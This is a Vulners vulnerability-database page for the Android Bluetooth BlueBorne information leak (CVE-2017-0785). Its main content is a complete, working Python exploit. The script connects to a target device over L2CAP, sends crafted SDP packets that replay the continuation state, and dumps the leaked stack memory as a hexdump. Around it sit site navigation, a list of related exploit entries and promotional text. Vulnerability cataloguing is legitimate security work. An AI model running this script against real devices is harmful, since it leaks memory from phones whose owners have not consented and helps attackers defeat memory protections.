Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Android Bluetooth - Blueborne Information Leak (2)

🗓️ 20 Sep 2017 00:00:00Reported by Kert OjasooType 
exploitpack
 exploitpack👁 89 Views

Android Bluetooth Blueborne Information Leak exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Android Bluetooth - Blueborne Information Leak (2) Exploit
29 Apr 201800:00
zdt
GithubExploit		Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Google Android
22 Sep 201722:03
githubexploit
GithubExploit		Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Google Android
4 Oct 201720:41
githubexploit
GithubExploit		Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Google Android
17 Dec 202503:49
githubexploit
GithubExploit		Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Google Android
30 Dec 202506:17
githubexploit
GithubExploit		Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Google Android
21 Mar 202607:17
githubexploit
Gitee		Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Google Android
27 Jul 202504:17
gitee
Gitee		Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Google Android
6 Sep 202511:51
gitee
BDU FSTEC		The vulnerability of the SDP protocol implementation in the Android operating system allows a perpetrator to disclose sensitive information about the system.
15 Sep 201700:00
bdu_fstec
Circl		CVE-2017-0785
21 Sep 201711:34
circl
Rows per page
from pwn import *
import bluetooth

if not 'TARGET' in args:
    log.info("Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX")
    exit()

target = args['TARGET']
service_long = 0x0100
service_short = 0x0001
mtu = 50
n = 30

def packet(service, continuation_state):
    pkt = '\x02\x00\x00'
    pkt += p16(7 + len(continuation_state))
    pkt += '\x35\x03\x19'
    pkt += p16(service)
    pkt += '\x01\x00'
    pkt += continuation_state
    return pkt

p = log.progress('Exploit')
p.status('Creating L2CAP socket')

sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
bluetooth.set_l2cap_mtu(sock, mtu)
context.endian = 'big'

p.status('Connecting to target')
sock.connect((target, 1))

p.status('Sending packet 0')
sock.send(packet(service_long, '\x00'))
data = sock.recv(mtu)

if data[-3] != '\x02':
    log.error('Invalid continuation state received.')

stack = ''

for i in range(1, n):
    p.status('Sending packet %d' % i)
    sock.send(packet(service_short, data[-3:]))
    data = sock.recv(mtu)
    stack += data[9:-3]

sock.close()

p.success('Done')

print hexdump(stack)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Sep 2017 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.12388
androidbluetoothblueborneinformation leakexploitcve-2017-0785l2capservicemtu
89